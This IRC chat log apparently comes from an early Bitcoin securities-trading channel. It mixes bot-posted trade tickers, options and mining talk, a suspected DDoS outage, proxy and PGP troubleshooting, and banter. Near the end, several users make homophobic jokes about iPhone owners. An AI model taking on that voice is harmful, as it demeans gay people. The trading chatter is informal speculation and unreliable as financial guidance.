!ticker m s.mpoe Mar 11 00:22:49 Ah, your hair. Your hair is soft. It's like a girl's. Now how do you get it that way? Mar 11 00:22:49 [MPEX:S.MPOE] 1D: 0.00074997 / 0.00074998 / 0.00075 (91316 shares, 68.49 BTC), 7D: 0.00067334 / 0.00074861 / 0.00078628 (10612769 shares, 7,944.90 BTC), 30D: 0.0006153 / 0.00068478 / 0.00078628 (57848323 shares, 39,613.60 BTC) Mar 11 00:22:49 ;;ticker m s.mpoe Mar 11 00:22:49 OIX:49.80 Mar 11 00:23:52 ;;calc (49.80-41)/49.80 Mar 11 00:24:13 gribble's ded Mar 11 00:24:21 (ticker [--bid|--ask|--last|--high|--low|--avg] [--currency XXX]) -- Return pretty-printed mtgox ticker. If one of the result options is given, returns only that numeric result (useful for nesting in calculations). If '--currency XXX' option is given, returns ticker for that three-letter currency code. It is up to you to make sure that the three letter code you enter is a valid (1 more message) Mar 11 00:24:23 0.176706827309 Mar 11 00:25:20 hmmm think that 41 call is a good price right now on the ask side Mar 11 00:25:55 if it keeps going up yeah Mar 11 00:26:37 well, i just meant in relation to the OIX Mar 11 00:27:17 but also 41: .17 | 43: .15 | 45 .17 Mar 11 00:28:29 haha yeah Mar 11 00:29:11 those were actually bids, not asks... Mar 11 00:30:42 yeah somebody is overbidding the bot on the 45s Mar 11 00:30:56 yep Mar 11 00:30:59 interesting Mar 11 00:31:11 wish i could write some options Mar 11 00:31:57 could write next month puts at 43 and basically buy this months 43 call Mar 11 00:33:01 so go ahead Mar 11 00:33:31 [BTCTC] [S.MPOE-PT] 47 @ 0.000725 = 0.0341 BTC [+] Mar 11 00:35:04 can you do that in coinbr? Mar 11 00:35:28 too poor for mpex at the moment, but hopefully soon Mar 11 00:36:04 i think jurovdoes it by request Mar 11 00:36:08 smickles might be doing it too Mar 11 00:36:12 oh nice Mar 11 00:36:32 kinda pissed i didn't get into s.dice at .35 Mar 11 00:36:53 it was there for what, like 3 months ? Mar 11 00:36:58 then suddenly whooosh Mar 11 00:37:01 yeah Mar 11 00:37:11 but it finally pulled back Mar 11 00:37:18 at 20000 btc profit in a month will do that :p Mar 11 00:37:24 yep Mar 11 00:37:34 last month was only 17k though right? Mar 11 00:37:40 yea Mar 11 00:37:55 but those 17k were worth like, 40% more when converted to fiat Mar 11 00:38:02 yes for sure Mar 11 00:38:10 record setting in fiat Mar 11 00:38:14 usd at least Mar 11 00:39:13 i saw recently s.dice paid like 70k total Mar 11 00:39:28 over 7 months Mar 11 00:39:38 yeah, it is a great stock to own i think Mar 11 00:39:52 i have mpoe and sdice and i contract Mar 11 00:41:35 i've been spending the past hours looking at various mpex graphs Mar 11 00:41:35 ok, think later this week i will try some otc purchases Mar 11 00:41:41 the stuff is fascinating somehow Mar 11 00:42:23 yeah, i like looking at historical data, but i rarely think it predicts the future Mar 11 00:42:35 i think "chart analysis" = augury Mar 11 00:43:19 O_o Mar 11 00:43:27 well...i mean in btc it is pretty easy to see that it is trending upwards Mar 11 00:43:38 but once people say "cup and handle" Mar 11 00:43:43 "head and shoulders" Mar 11 00:43:51 hows the contract stuff going? Mar 11 00:44:28 me? Mar 11 00:44:43 yeah :) Mar 11 00:44:58 hmmm...i only have 1 option contract at 41 sso that is decent Mar 11 00:45:06 [BTCTC] [RSM] 1 @ 0.00899 BTC [+] Mar 11 00:45:08 [BTCTC] [RSM] 1 @ 0.00899 BTC [+] Mar 11 00:45:20 but as far as business stuff i am trying to write drivers to grab market data for a crossing engine Mar 11 00:45:42 but that is kinda tough Mar 11 00:45:57 when i am good at neither c# or javascript Mar 11 00:46:03 [BTCTC] [RSM] 48 @ 0.009 = 0.432 BTC [+] Mar 11 00:46:09 but i'll muddle through Mar 11 00:46:12 i'm good at making movies Mar 11 00:46:32 seen the documentary? Mar 11 00:47:40 also, i am having a lot of fun with trying to do different roles to set up a company Mar 11 00:47:40 looking into gnucash for my accounting stuff Mar 11 00:47:40 going to try and design the logo (fingers crossed) Mar 11 00:48:30 has anyone seen a font that includes the double barred B? Mar 11 00:53:57 !mp Mar 11 00:53:58 ;;mp Mar 11 00:55:00 Error: "messageparser" is not a valid command. Mar 11 00:56:34 ;;bc,stats Mar 11 00:56:38 Current Blocks: 225257 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 534 blocks | Next Difficulty In About: 2 days, 23 hours, 12 minutes, and 0 seconds | Next Difficulty Estimate: 4880505.1893 | Estimated Percent Change: 11.73635 Mar 11 00:56:43 yeah watched a bit of it, pretty good Mar 11 00:57:24 [HAVELOCK] [SDICE] 1 @ 0.61199999 BTC [+] Mar 11 00:57:24 [HAVELOCK] [SDICE] 1 @ 0.612 BTC [+] Mar 11 00:57:24 [HAVELOCK] [SDICE] 5 @ 0.6149999 = 3.075 BTC [+] Mar 11 00:57:30 Please use http://dpaste.com/ Mar 11 01:00:04 [BTCTC] [ASICMINER-PT] 4 @ 0.7 = 2.8 BTC [+] Mar 11 01:01:41 ;;mp http://dpaste.com/1018705/ Mar 11 01:01:41 little help? Mar 11 01:01:41 mp! http://dpaste.com/1018705/ Mar 11 01:01:41 Error: The "MessageParser" plugin is loaded, but there is no command named "http://dpaste.com/1018705/" in it. Try "list MessageParser" to see the commands in the "MessageParser" plugin. Mar 11 01:02:12 that's not what mp stands for gribble. you must be new Mar 11 01:02:25 the-bucket-shop Mar 11 01:02:30 !mp http://dpaste.com/1018705/ Mar 11 01:02:31 Processing. Mar 11 01:02:33 Response: http://dpaste.com/1018708/plain/ Mar 11 01:02:36 there ya go Mar 11 01:02:46 (its yours) Mar 11 01:02:48 thanks kakobrekla Mar 11 01:03:41 my key stopped working. not sure how to use the right one. sorry for the noise everyone. Mar 11 01:04:40 did you update your mpex public key Mar 11 01:05:02 ah its your private that is off Mar 11 01:05:22 hrm Mar 11 01:05:34 check you are signing with the right one Mar 11 01:06:29 thanks kafka Mar 11 01:06:30 the-bucket-shop make sure you're using the right mpex key Mar 11 01:06:41 if you're not it will say YOUR key is blown. Mar 11 01:06:54 it just basically means "couldn't get a key we know" Mar 11 01:07:03 do I need to change the mpex key to use apex.coinbr.co Mar 11 01:07:04 [MPEX] [S.DICE] 250 @ 0.0059998 = 1.5 BTC [-] Mar 11 01:07:05 m Mar 11 01:07:46 no, you have to use the new mpex key Mar 11 01:07:58 it switched on the 10th. this was announced like last month. do you have it ? Mar 11 01:08:34 I did nothing to update a key. must have ignored the announcement. Mar 11 01:08:47 [BTCTC] [COGNITIVE] 1 @ 0.1999 BTC [+] Mar 11 01:08:52 a ok 1 sec Mar 11 01:09:16 http://pastebin.com/9M25zBr7 the-bucket-shop Mar 11 01:10:06 mp sending you some money if I can get through this. Mar 11 01:10:39 [BTCTC] [S.MPOE-PT] 130 @ 0.000726 = 0.0944 BTC [+] Mar 11 01:13:30 !ticker mpex s.dice Mar 11 01:13:32 [MPEX:S.DICE] 1D: 0.005884 / 0.00594579 / 0.006 (30568 shares, 181.75 BTC), 7D: 0.00300001 / 0.005599 / 0.006225 (409396 shares, 2,292.21 BTC), 30D: 0.00300001 / 0.00616121 / 0.0069 (3629525 shares, 22,362.28 BTC) Mar 11 01:26:23 !help Mar 11 01:26:25 List of commands: Mar 11 01:26:25 !ticker (desc: returns current ticker values, supported: MPEX, HAVELOCK, BTCTCO) Mar 11 01:26:26 !mp (desc: returns the response from MPEX order) Mar 11 01:30:00 Bugpowder mpex.coinbr.com Mar 11 01:30:56 I see its back Mar 11 01:31:19 I totally forgot how to manually sign and encrypt the orders Mar 11 01:31:27 :p Mar 11 01:33:32 looks like the panic has subsided Mar 11 01:34:08 I've got a working STAT, but I'd like to get rid of this message before sending money There is no assurance this key belongs to the named user Mar 11 01:34:35 sign the key Mar 11 01:34:50 ;;ticker Mar 11 01:34:51 BTCUSD ticker | Best bid: 45.62989, Best ask: 45.79000, Bid-ask spread: 0.16011, Last trade: 45.79000, 24 hour volume: 36079.61301029, 24 hour low: 45.51000, 24 hour high: 47.95000, 24 hour vwap: 46.85896 Mar 11 01:35:03 [HAVELOCK] [SDICE] 9 @ 0.61887999 = 5.5699 BTC [+] Mar 11 01:37:03 [HAVELOCK] [SDICE] 21 @ 0.61887999 = 12.9965 BTC [+] Mar 11 01:38:02 [HAVELOCK] [SDICE] 9 @ 0.6188888 = 5.57 BTC [+] Mar 11 01:40:02 [HAVELOCK] [SDICE] 1 @ 0.61899899 BTC [+] Mar 11 01:40:03 [HAVELOCK] [SDICE] 2 @ 0.618999 = 1.238 BTC [+] Mar 11 01:40:05 [HAVELOCK] [SDICE] 2 @ 0.619 = 1.238 BTC [+] Mar 11 01:40:06 [HAVELOCK] [SDICE] 5 @ 0.619 = 3.095 BTC [+] Mar 11 01:40:06 [HAVELOCK] [SDICE] 6 @ 0.6199991 = 3.72 BTC [+] Mar 11 01:40:12 gotta prep for job talk. Peace out. See yall in a few days. Mar 11 01:40:30 make S.DICE hit .0065 while i'm gone please Mar 11 01:41:30 http://www.downforeveryoneorjustme.com/satoshidice.com/ Mar 11 01:42:01 oh noes Mar 11 01:42:34 bets are still active and working though, it appears Mar 11 01:43:26 at least its showing the same market reaction as mpex, site down price up Mar 11 01:43:56 seems there's a need for a distributed list of addresses. wikileaks style. not sure how to prevent fraud on that though Mar 11 01:44:47 the addresses are built into blockchain.info's wallet Mar 11 01:46:41 anyone care to make that known on bitcointalk.org, or is this my responsibility? I haven't seen satoshidice at the top of the agenda over there for at least 12 hours. Mar 11 01:48:44 my friend, fancy_pants is going to ham it up sky is falling where are the bitcoin police. hopefully someone will correct any inaccuracies. Mar 11 01:49:03 I wonder if it's getting DDoS'd by the same people/person who are/is attacking mpex Mar 11 01:49:46 [BTCTC] [ASICMINER-PT] 1 @ 0.7 BTC [+] Mar 11 01:50:38 80% yes Mar 11 01:51:00 [BTCTC] [ASICMINER-PT] 1 @ 0.7 BTC [+] Mar 11 01:51:16 make sens Mar 11 01:52:26 but like say above, the script is ok ! pp play atm Mar 11 01:54:26 http://i.imgur.com/KzY4tPF.jpg - avalons in stacks and what appears alot more already packaged in the background (older image, but amusing) Mar 11 01:54:30 jurov: how come http://mpex.coinbr.com/mpex-mktdepth.php starts with a "JurovP" Mar 11 01:55:06 er, "JurovP(" and ends with a ")", that's not json :P Mar 11 01:55:26 oh, and there's a semi-colon at the end too @.@ Mar 11 01:55:27 smickles it's some javascript thing i tihnk Mar 11 01:55:50 there's two files. one's made like a function for some browsingreason Mar 11 01:55:54 jurvo asked for it. Mar 11 01:56:20 mircea_popescu: i'm coding a nice looking gui client for mpex and plan on selling it for 1 btc Mar 11 01:56:27 haha cool idea. Mar 11 01:56:39 but anyway, let me look here. Mar 11 01:57:05 it'll be for linux, win, mac, and android Mar 11 01:57:51 that ruby thing doesn't compile on my mac or hacked iPhone. Mar 11 01:58:21 it doesn't matter, but thought you'd like the feedback Mar 11 01:58:39 the-bucket-shop: FabianB's ruby thing? Mar 11 01:58:42 smickles one's vwap-json and the other jsonp Mar 11 01:58:47 you using the jsonp ? Mar 11 01:59:03 uh, mpex-mktdepth.php? Mar 11 01:59:06 that name doesn't ring a bell. it was called mpex Mar 11 01:59:40 Fa Wuxi copyright Mar 11 02:00:09 mpex-mktdepth.php / mpex-mktdepth-jsonp.php Mar 11 02:00:16 mpex-vwap.php / mpex-vwap-jsonp.php Mar 11 02:01:14 both mpex-mktdepth.php / mpex-mktdepth-jsonp.php have that JurovP bit at the beginning Mar 11 02:01:23 o noway Mar 11 02:01:57 heh, yeah Mar 11 02:02:15 for chrissakes. bleeding cache. Mar 11 02:02:21 it's getting fixed. Mar 11 02:02:23 my cache? Mar 11 02:02:58 nono mine Mar 11 02:03:55 smickles hm, i just loaded mpex-mktdepth.php Mar 11 02:03:59 and it is behaving normally ? Mar 11 02:04:31 mircea_popescu: thru the coinbr proxy or directly? Mar 11 02:04:53 that's a point o.o Mar 11 02:05:12 da fuck ?! Mar 11 02:05:52 yes ! Mar 11 02:05:55 i dunno, but i'd hate to code in something to handle that, then when the main site comes back online it fucks stuff up Mar 11 02:06:29 this is so weird, because vwap does not show the same behaviour Mar 11 02:08:08 and it's just a proxy, wtf, it randomly changes ONE url ? Mar 11 02:08:44 [BTCTC] [ASICMINER-PT] 1 @ 0.7 BTC [+] Mar 11 02:08:46 when you update the .php on mpex's servers does it need to be manually updated on proxies? Mar 11 02:09:07 I'm not sure how the proxy system works Mar 11 02:09:19 pizzaman1337 a. the file;s never been updated in montsh (really, since jurov wanted the procedure thing) Mar 11 02:09:21 it would be cool if you could distribute something for people to setup their own proxies Mar 11 02:09:27 and b. the proxies just php proxy, it's fixed Mar 11 02:09:39 this has been distributed already hehe Mar 11 02:09:41 let me find it Mar 11 02:09:48 oh, ok Mar 11 02:10:37 pizzaman1337 http://pastebin.com/vRzjux7e scroll Mar 11 02:11:57 ok, cool Mar 11 02:12:04 [BTCTC] [COGNITIVE] 2 @ 0.1999 = 0.3998 BTC [+] Mar 11 02:15:51 [BTCTC] [RSM] 9 @ 0.009 = 0.081 BTC [+] Mar 11 02:16:04 [MPEX] [S.MPOE] 65000 @ 0.00075 = 48.75 BTC [+] Mar 11 02:21:02 [BTCTC] [S.MPOE-PT] 7 @ 0.000726 = 0.0051 BTC [+] Mar 11 02:29:09 !ticker mpex s.dice Mar 11 02:29:10 [MPEX:S.DICE] 1D: 0.005884 / 0.00594579 / 0.006 (30568 shares, 181.75 BTC), 7D: 0.00300001 / 0.005599 / 0.006225 (409396 shares, 2,292.21 BTC), 30D: 0.00300001 / 0.00616121 / 0.0069 (3629525 shares, 22,362.28 BTC) Mar 11 02:29:58 vampireb hey, are you vampire on forum ? Mar 11 02:31:04 [MPEX] [S.DICE] 108 @ 0.0059998 = 0.648 BTC [-] Mar 11 02:31:39 correct. Mar 11 02:31:50 haha Mar 11 02:32:18 thanks for the offer, but vps couldn't really take it. Mar 11 02:33:45 you probably should extend the irc bot to show depth Mar 11 02:34:32 $depth Mar 11 02:34:36 mircea_popescu: http://pastebin.com/5Xw7ySxD Mar 11 02:35:06 but anyway, you can go to mpex.coinbr.com Mar 11 02:35:19 and enjoy the mpex site in all its glory. Mar 11 02:35:37 i dont really need to go there Mar 11 02:37:02 [HAVELOCK] [SDICE] 2 @ 0.592 = 1.184 BTC [-] Mar 11 02:37:04 [HAVELOCK] [SDICE] 15 @ 0.59100005 = 8.865 BTC [-] Mar 11 02:37:05 [HAVELOCK] [SDICE] 1 @ 0.59100001 BTC [-] Mar 11 02:37:06 [HAVELOCK] [SDICE] 1 @ 0.591 BTC [-] Mar 11 02:37:07 [HAVELOCK] [SDICE] 1 @ 0.59 BTC [-] Mar 11 02:39:02 [HAVELOCK] [SDICE] 1 @ 0.59 BTC [-] Mar 11 02:39:04 [HAVELOCK] [SDICE] 9 @ 0.5850001 = 5.265 BTC [-] Mar 11 02:39:04 [HAVELOCK] [SDICE] 5 @ 0.585 = 2.925 BTC [-] Mar 11 02:39:05 [HAVELOCK] [SDICE] 35 @ 0.581 = 20.335 BTC [-] Mar 11 02:41:02 [HAVELOCK] [SDICE] 4 @ 0.581 = 2.324 BTC [-] Mar 11 02:41:59 chromebooks are awesome, except can't remap keys. which makes using irssi a challenge Mar 11 02:43:52 ;;bc,stats Mar 11 02:43:54 Current Blocks: 225274 | Current Difficulty: 4367876.000842196 | Next Difficulty At Block: 225791 | Next Difficulty In: 517 blocks | Next Difficulty In About: 2 days, 19 hours, 4 minutes, and 12 seconds | Next Difficulty Estimate: 4893908.51557 | Estimated Percent Change: 12.04321 Mar 11 02:44:30 by the time i;ll get my asic from brl the diff will be at 10mil Mar 11 02:44:33 bfl Mar 11 02:45:00 yu'e getting an asic from bfl ? Mar 11 02:45:11 what sorcery is this Mar 11 02:45:32 the hot one, jalapeno. ~160 is pocket change Mar 11 02:45:36 the only thing for sure with bfl is that there will be eleventy threads created about them today Mar 11 02:45:43 i read that 'yu'e getting an ascii from bfl ?' Mar 11 02:45:54 oh may be getting Mar 11 02:46:03 i dont follow "hardware" topics Mar 11 02:46:31 thing is the asic market is huge. Mar 11 02:46:37 i'd buy some if there actually existed any. Mar 11 02:47:11 i just needed a coffee cup warmer, i hopefully they can deliver that at least Mar 11 02:47:52 coffe cup warmers dont work Mar 11 02:48:04 i had a glass made specifically for it Mar 11 02:48:09 with a flat and metal surface Mar 11 02:48:12 and it worked shit. Mar 11 02:48:24 https://bitcointalk.org/index.php?topic=148335.msg1609151#msg1609151 I thought those looked like even worse underfill examples not chipped die Mar 11 02:48:28 suface = bottom Mar 11 02:48:37 can i buy something right now they'll at least make me 1btc a day, even when all the avalons come or whatever i can still mine 1btc a day? Mar 11 02:48:54 that will sorry Mar 11 02:49:21 no? Mar 11 02:49:27 the mining diffuculty will go up Mar 11 02:49:30 ghey Mar 11 02:49:45 you could buy a 1btc/day mining contract Mar 11 02:49:53 i could? Mar 11 02:50:02 sure, I'll sell you one for 60btc/month Mar 11 02:50:21 done send me all your details Mar 11 02:50:33 earth months? Mar 11 02:51:49 anyone want any asicminer shares? i want out Mar 11 02:52:14 how much? Mar 11 02:52:25 1.8 btc each Mar 11 02:52:35 sounds legit Mar 11 02:52:57 for you dubs 2.0 Mar 11 02:54:07 well looks like intrade is done: http://www.intrade.com/v4/home/ Mar 11 02:54:35 heh Mar 11 02:54:41 "make bitbet more like intrade" Mar 11 02:55:31 BitHub maybe shares or bonds. Mar 11 02:55:56 hmmm Mar 11 02:56:02 i already tried that Mar 11 02:56:07 has dice commented on the downtime? Mar 11 02:56:08 didn't work too good ? Mar 11 02:56:13 dub not afaik. Mar 11 02:56:31 but im guessing ddos. Mar 11 02:57:15 it was okey just want to do something myself or mine some coins myself or something Mar 11 02:57:29 ah yes Mar 11 02:57:29 dice is on amazon Mar 11 02:57:32 that drives many. Mar 11 02:57:39 vampireb so ? Mar 11 02:57:55 so ddos shouldnt be as effective :) Mar 11 02:58:18 waiting for something new to put my coins into Mar 11 02:58:32 vampireb i lost some amazons, Mar 11 02:58:40 jurov lost one too. it can be done. Mar 11 02:59:06 it can be done, no denying that. Mar 11 03:02:30 looks like its up Mar 11 03:04:30 i just sent a less than 1 Mar 11 03:04:31 lol Mar 11 03:08:51 [BTCTC] [B.YABMC] 1 @ 0.01989 BTC [+] Mar 11 03:08:54 $depth Mar 11 03:08:58 benkay: http://pastebin.com/06Yf5w4j Mar 11 03:16:14 ;;ticker Mar 11 03:16:16 BTCUSD ticker | Best bid: 45.71717, Best ask: 45.90000, Bid-ask spread: 0.18283, Last trade: 45.90000, 24 hour volume: 36180.55424484, 24 hour low: 45.47100, 24 hour high: 47.95000, 24 hour vwap: 46.81412 Mar 11 03:18:59 was the mpex bot not spitting back at dpaste just recently? Mar 11 03:19:03 i coulda swore... Mar 11 03:22:41 ;;goxlag Mar 11 03:22:42 0 seconds Mar 11 03:32:12 whats up everyone Mar 11 03:34:07 http://imgur.com/O7ioK9D&NkxCSHS Mar 11 03:34:25 let me know what you think lol Mar 11 03:34:27 whats that Mar 11 03:34:36 my first attempt at logo design lol Mar 11 03:34:39 a duck Mar 11 03:34:41 it's not great Mar 11 03:34:46 black swan Mar 11 03:34:54 goes quack no? Mar 11 03:34:57 hehehe Mar 11 03:34:58 yeah Mar 11 03:41:56 that's not a logo dood. what do you think a logo is ? Mar 11 03:44:05 at first glance its says bitches Mar 11 03:44:10 [HAVELOCK] [SDICE] 1 @ 0.59 BTC [+] Mar 11 03:44:46 benkay assbot spits dpaste, mpexbot pastebin Mar 11 03:44:49 redundancy ftw Mar 11 03:45:02 [HAVELOCK] [HIM] 1 @ 1.74 BTC [-] Mar 11 03:45:21 y u no give me plain json? Mar 11 03:45:34 with this freepaste services Mar 11 03:45:42 parse all the things... Mar 11 03:45:51 they have raw ? Mar 11 03:46:08 i'm not serious Mar 11 03:46:33 well it was mostly for the login page on the google apps website Mar 11 03:46:46 so it wouldn't need to have google logo Mar 11 03:47:27 Josh_Rossi a logo is not an image, as in, a bmp. Mar 11 03:47:35 a logo is a design, such as a vector file. Mar 11 03:47:42 a concept anyway. must be scalable. Mar 11 03:48:14 yes Mar 11 03:48:21 this was just for that specific image Mar 11 03:48:32 which was limited to 159x43 px or something like that Mar 11 03:48:36 mkay. Mar 11 03:48:41 hold on, i'll show you how it looks Mar 11 03:48:46 i lost my less than 1 bet Mar 11 03:48:49 fucking scam. Mar 11 03:49:55 http://imgur.com/5UYrCwq Mar 11 03:50:29 anyway, just a first step Mar 11 03:50:43 i was masochistic, so I used GIMP Mar 11 03:50:53 whats the service about Mar 11 03:51:10 Eventually it should be an investment vehicle Mar 11 03:51:52 ie. you can get shares in your brokerage account, and basically track the broad based bitcoin economy Mar 11 03:52:04 that's the ultimate goal Mar 11 03:52:13 an etf Mar 11 03:52:26 till then, just having fun trying to build things Mar 11 03:53:10 have a few projects, but I figured I would need a site, and all the other stuff eventually and that was the best domain name i could find Mar 11 03:53:43 i'm selling digicreds.com if you're intrested Mar 11 03:56:02 i got btcshares, btc-etf, and one other one Mar 11 03:56:47 ;;ticker Mar 11 03:56:48 BTCUSD ticker | Best bid: 46.00000, Best ask: 46.22987, Bid-ask spread: 0.22987, Last trade: 46.22887, 24 hour volume: 33473.44140151, 24 hour low: 45.47100, 24 hour high: 47.95000, 24 hour vwap: 46.74346 Mar 11 03:57:27 i have bitcoin-assets.com and it has ass so beat that. Mar 11 03:57:53 that is an awesome one Mar 11 03:58:19 !ticker m s.dice Mar 11 03:58:20 [MPEX:S.DICE] 1D: 0.005884 / 0.00594598 / 0.006 (30676 shares, 182.40 BTC), 7D: 0.00300001 / 0.0055991 / 0.006225 (409504 shares, 2,292.86 BTC), 30D: 0.00300001 / 0.00616274 / 0.0069 (3619271 shares, 22,304.65 BTC) Mar 11 03:58:24 ya it was free until like a week ago Mar 11 04:04:53 pretty sweet Mar 11 04:06:41 titsets. Mar 11 04:07:12 hehe @ it has ass Mar 11 04:08:11 i think i found the right music for a bitcoin type action film Mar 11 04:08:14 https://www.youtube.com/watch?v=3JuBsif1RqM Mar 11 04:15:40 I think this is more appropriate https://www.youtube.com/watch?v=i1EG-MKy4so Mar 11 04:15:50 BitHub : or this https://www.youtube.com/watch?v=kCuYX4ZGLuA Mar 11 04:16:36 hehe checking them out Mar 11 04:16:52 hah dub wtf Mar 11 04:17:14 that's definitly the soundtrack to the mircea character Mar 11 04:17:20 please tell me you've seen that before Mar 11 04:17:27 haha nah man Mar 11 04:17:32 if not, you've failed at internet Mar 11 04:17:42 that's because i win at real life Mar 11 04:18:04 rubber chicken, nice Mar 11 04:19:02 old school Mar 11 04:19:04 if the film coveres bitcointalk you'll need this https://www.youtube.com/watch?v=Q15fB7E28Zs Mar 11 04:19:33 hah yeah this one i've seen Mar 11 04:19:38 seems like more of a 4chan theme Mar 11 04:20:26 4chan is a much more serious and useful site than bitcointalk Mar 11 04:20:45 sunday : http://www.youtube.com/watch?v=5_JmXCNPs6Y Mar 11 04:20:47 meh Mar 11 04:20:49 id put this one Mar 11 04:20:51 https://www.youtube.com/watch?v=kdvTkddp1F0 Mar 11 04:21:46 seen teh new one? https://www.youtube.com/watch?v=jq57BjBVq7o Mar 11 04:21:52 i'm not working on a bitcoin film heh but i am intrested in making some bitcoin commercials Mar 11 04:23:59 lyrics aint that bad Mar 11 04:24:02 but the song Mar 11 04:24:06 ugh. Mar 11 04:24:46 This is Bitcoin ! http://www.youtube.com/watch?feature=player_embedded&v=qAfUhoubbDQ 200m/h Mar 11 04:25:53 kako : haha priceless Mar 11 04:26:39 hah error heard that one Mar 11 04:31:15 https://www.youtube.com/watch?v=5WiXMcsfvXE Mar 11 04:31:46 BTC at $5 in background Mar 11 04:31:49 [MPEX] [S.DICE] 250 @ 0.0059998 = 1.5 BTC [-] Mar 11 04:32:42 $depth Mar 11 04:32:46 benkay: http://pastebin.com/P3vXpBCB Mar 11 04:43:03 [HAVELOCK] [KCIM] 1 @ 1.2 BTC [-] Mar 11 04:46:16 $depth s.mpoe Mar 11 04:46:18 smickles: An error has occurred and has been logged. Please contact this bot's administrator for more information. Mar 11 04:46:22 bah Mar 11 04:48:06 $depth Mar 11 04:48:09 benkay: http://pastebin.com/4QrxFBuQ Mar 11 05:01:40 $proxies Mar 11 05:02:49 http://www.telegraph.co.uk/finance/comment/ambroseevans_pritchard/9920666/Germanys-anti-euro-party-is-a-nasty-shock-for-Angela-Merkel.html Mar 11 05:04:27 fuckwit should never have allied with the russians. Mar 11 05:07:14 $depth s.mpoe Mar 11 05:07:17 smickles: {u'S': [[100000, 10000], [75000, 244641], [77988, 1399], [78500, 500000], [78000, 500000], [76718, 17454], [100000000, 10000], [78984, 23163], [79000, 450000], [1000000, 2000], [10000000, 2000], [77999, 54540], [1000000, 100000]], u'B': [[53500, 168150], [101, 10000000], [55000, 340602], [100, 10000000], [38150, 14391957], [55500, 150000], [40000, 150000], [55501, 500], [38151, 5000], (1 more message) Mar 11 05:07:22 har! Mar 11 05:07:46 $depth Mar 11 05:07:49 benkay: http://pastebin.com/LfUZXwdm Mar 11 05:08:00 $depth s.mpoe Mar 11 05:08:04 benkay: {u'S': [[100000, 10000], [75000, 244641], [77988, 1399], [78500, 500000], [78000, 500000], [76718, 17454], [100000000, 10000], [78984, 23163], [79000, 450000], [1000000, 2000], [10000000, 2000], [77999, 54540], [1000000, 100000]], u'B': [[53500, 168150], [101, 10000000], [55000, 340602], [100, 10000000], [38150, 14391957], [55500, 150000], [40000, 150000], [55501, 500], [38151, 5000], (1 more message) Mar 11 05:08:25 implying there's a max message size on this irc network? Mar 11 05:14:58 that's kinda spammy Mar 11 05:15:13 smickles could it return just 4 each side ? Mar 11 05:18:26 $depth Mar 11 05:18:29 benkay: http://pastebin.com/3Xs9nGD8 Mar 11 05:24:35 $depth Mar 11 05:24:45 this is getting annoying. Mar 11 05:24:48 benkay: http://pastebin.com/MgkTxcBr Mar 11 05:40:03 fuckin people. Mar 11 05:40:31 what now? Mar 11 05:41:43 im no good for support Mar 11 05:41:48 get too upset. Mar 11 05:43:11 aww! Mar 11 05:47:44 mircea_popescu: it's spammy now b/c it's just the primitive. I plan to do exactly what you say, a range around the center. for now, peeps should just use it in pm Mar 11 05:48:05 kk Mar 11 05:48:06 benkay: can I make it better somehow? Mar 11 05:48:33 like this http://imgur.com/fwa71Fj maybe? Mar 11 05:48:36 https://bitcointalk.org/index.php?topic=150803.msg1609580#msg1609580 repentance I am dissapoint Mar 11 05:48:57 what, repentance is here ? Mar 11 05:49:11 idk Mar 11 05:49:15 doubt it Mar 11 05:49:42 what's that? Mar 11 05:49:45 something custom? Mar 11 05:49:52 product in the wild? Mar 11 05:50:19 benkay: an mpex gui which i'm developing Mar 11 05:50:37 should work on linux, win, mac, and android Mar 11 05:51:17 each of those platforms has all the dependancies it requires Mar 11 05:51:25 iOS? no Mar 11 05:51:28 neat Mar 11 05:51:34 of course not Mar 11 05:51:40 that damn platform Mar 11 05:51:52 not to mention i don't have a mac, and you need xcode to make an ios app Mar 11 05:51:58 see above Mar 11 05:52:09 that's cool Mar 11 05:52:17 that and nobody uses iphone Mar 11 05:52:25 barrign fanboys and homosexuals Mar 11 05:52:34 you could sa the same about windows Mar 11 05:52:38 ;D Mar 11 05:52:38 there's this one market i'm interested in Mar 11 05:52:43 lots of disposable income Mar 11 05:52:50 sold on ui investments Mar 11 05:53:03 its homos Mar 11 05:53:13 enlightened commentary Mar 11 05:53:26 nice Mar 11 05:53:28 dub, not homos, dinks Mar 11 05:53:36 dub homosexuals trade too you know Mar 11 05:53:39 [BTCTC] [B.YABMC] 1 @ 0.01301 BTC [-] Mar 11 05:53:41 I finally got pgp working on the iPhone Mar 11 05:53:49 ;;ident Mar 11 05:53:50 You are identified as user Josh_Rossi, with GPG key id C286BB96FE9B6CD3, key fingerprint 3812AFD43A6B8A057F37D858C286BB96FE9B6CD3, and bitcoin address 1LokQrHj14NU93tC6pZfTZyyRHhAVakQmX Mar 11 05:53:58 bigotry aside, i'd actually like the full json in this irc channel Mar 11 05:54:13 or another Mar 11 05:54:16 wd MJR_ Mar 11 05:54:18 wow, I thought you addy was 1Loki for a sec there Mar 11 05:54:31 im a dink and she's only got one cause its work provided Mar 11 05:54:32 benkay full json what ? Mar 11 05:54:42 depth Mar 11 05:54:48 $vwap Mar 11 05:54:49 dont talk to him, we dont need his kind here, fuckin macs Mar 11 05:54:51 benkay: http://pastebin.com/3Z4a24q1 Mar 11 05:54:51 dub: work provided baby? Mar 11 05:54:53 [BTCTC] [B.YABMC] 1 @ 0.013 BTC [-] Mar 11 05:54:57 I know, it was a close one Mar 11 05:55:07 I kinda want a vanity address Mar 11 05:55:12 smickles: iphone Mar 11 05:55:16 i just don't really like the tiny little bit of fragility that parsing that url introduces Mar 11 05:55:17 you can't be a dink with a baby Mar 11 05:55:28 it's not a big deal though because i think i'm going to cache the ticker Mar 11 05:55:56 *shrug* Mar 11 05:56:19 thoughts? Mar 11 05:56:26 benkay: would you prefer the raw pastebin? Mar 11 05:56:31 much Mar 11 05:56:40 a url pointing directly to raw makes me much more the happy Mar 11 05:56:43 i'll switch it then Mar 11 05:56:46 ! Mar 11 05:56:48 thanks. Mar 11 05:56:51 this is gold http://www.youtube.com/watch?v=CtZs4Gj2lKw Mar 11 05:57:03 benkay incidentally, why not suck directly the url ? Mar 11 05:57:07 or what are you trying to do ? Mar 11 05:57:16 'cause scraping Mar 11 05:57:21 don' wanna Mar 11 05:57:28 uh listen Mar 11 05:57:35 http://mpex.coinbr.com/mpex-vwap.php Mar 11 05:57:51 bril. Mar 11 05:57:58 http://mpex.coinbr.com/mpex-mktdepth.php Mar 11 05:58:03 it's where the bot gets them from Mar 11 05:58:10 okay Mar 11 05:58:11 thanks Mar 11 05:58:17 obviously you shoudl code proxy-aware and bot-aware, but for a begining this should 